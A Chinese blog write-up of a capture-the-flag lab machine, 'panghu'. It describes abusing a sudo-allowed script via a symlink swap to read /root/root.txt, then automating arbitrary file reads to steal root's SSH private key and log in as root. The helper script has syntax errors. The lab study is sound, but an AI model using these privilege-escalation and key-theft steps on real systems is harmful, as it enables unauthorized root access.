guayu-kakeru
0%

panghu

发表于 分类于

panghu复盘


这个是个简单的靶机,但是我有一个点没有想到,卡了很久,开了懦夫模式
登录入口是ssh/panghu

第一阶段(读到/root/root.txt)

有一个sudo权限的脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
jan:/etc/ssh$ sudo -l
[sudo] password for ssh: 
Matching Defaults entries for ssh on jan:
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

Runas and Command-specific defaults for ssh:
    Defaults!/usr/sbin/visudo env_keep+="SUDO_EDITOR EDITOR VISUAL"

User ssh may run the following commands on jan:
    (root) PASSWD: /opt/lzh.sh
jan:/etc/ssh$ cat /opt/lzh.sh
#!/bin/sh

cd /home/ssh
cat backup/hi

内容是查看/home/ssh/backup/hi
现在的目标是如何利用这个脚本能读到/root/root.txt呢
没有修改hi的权限,对hi没有任何的权限
但是对backup这个目录有x操作权限,无法删除就把backup重命名
然后新建一个backup 然后用软链接就可以读到了
(我一直在hi这个文件里面想,其实啥都没有)

1
2
ln -sv /root/root.txt /home/ssh/backup/hi
sudo /opt/lzh.sh

第二阶段

通过第一阶段就可以知道,利用lzh.sh就可以读取任意文件内容
所以可以编写一个脚本,脚本内容来自群里的eviden

1
2
3
4
5
6
7
8
9
#!/bin/sh
if[ -e "backup" ]; then 
    rm -rf backup
    echo "removed"
fi
mkdir -p backup
source_file=$1
ln -sn "${$source_file}" "/home/ssh/backup/hi"
sudo /opt/lzh.sh

这样子就可以自动读取了
我们去读ssh的配置文件,思路是读取私钥然后登录root

找到ssh私钥的地址 但是不是id_rsa是id_ed25519,而且这个目录在root目录下面,不是ssh目录,就觉得为什么有私钥还登录不上root,hhhhh

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
jan:~$ ./m.sh /etc/ssh/ssh_config
removed
'backup/hi' -> '/etc/ssh/ssh_config'
#	$OpenBSD: ssh_config,v 1.36 2023/08/02 23:04:38 djm Exp $

# This is the ssh client system-wide configuration file.  See
# ssh_config(5) for more information.  This file provides defaults for
# users, and the values can be changed in per-user configuration files
# or on the command line.

# Configuration data is parsed as follows:
#  1. command line options
#  2. user-specific file
#  3. system-wide file
# Any configuration value is only changed the first time it is set.
# Thus, host-specific definitions should be at the beginning of the
# configuration file, and defaults at the end.

# Site-wide defaults for some commonly used options.  For a comprehensive
# list of available options, their meanings and defaults, please see the
# ssh_config(5) man page.

# Include configuration snippets before processing this file to allow the
# snippets to override directives set in this file.
#Include /etc/ssh/ssh_config.d/*.conf
#Banner /etc/shadow
# Host *
#   ForwardAgent no
#   ForwardX11 no
#   PasswordAuthentication yes
#   HostbasedAuthentication no
#   GSSAPIAuthentication no
#   GSSAPIDelegateCredentials no
#   BatchMode no
#   CheckHostIP no
#   AddressFamily any
#   ConnectTimeout 0
#   StrictHostKeyChecking ask
#   IdentityFile ~/.ssh/id_rsa
#   IdentityFile ~/.ssh/id_dsa
#   IdentityFile ~/.ssh/id_ecdsa
#   IdentityFile ~/.ssh/id_ed25519
#   Port 22
#   Ciphers aes128-ctr,aes192-ctr,aes256-ctr,aes128-cbc,3des-cbc
#   MACs hmac-md5,hmac-sha1,umac-64@openssh.com
#   EscapeChar ~
#   Tunnel no
#   TunnelDevice any:any
#   PermitLocalCommand no
#   VisualHostKey no
#   ProxyCommand ssh -q -W %h:%p gateway.example.com
#   RekeyLimit 1G 1h
#   UserKnownHostsFile ~/.ssh/known_hosts.d/%k
1
jan:~$ ./m.sh /root/.ssh/id_ed25519

vi id_rsa
chmod 600 id_rsa
ssh root@192.168.240.15 -i id_rsa

登录root了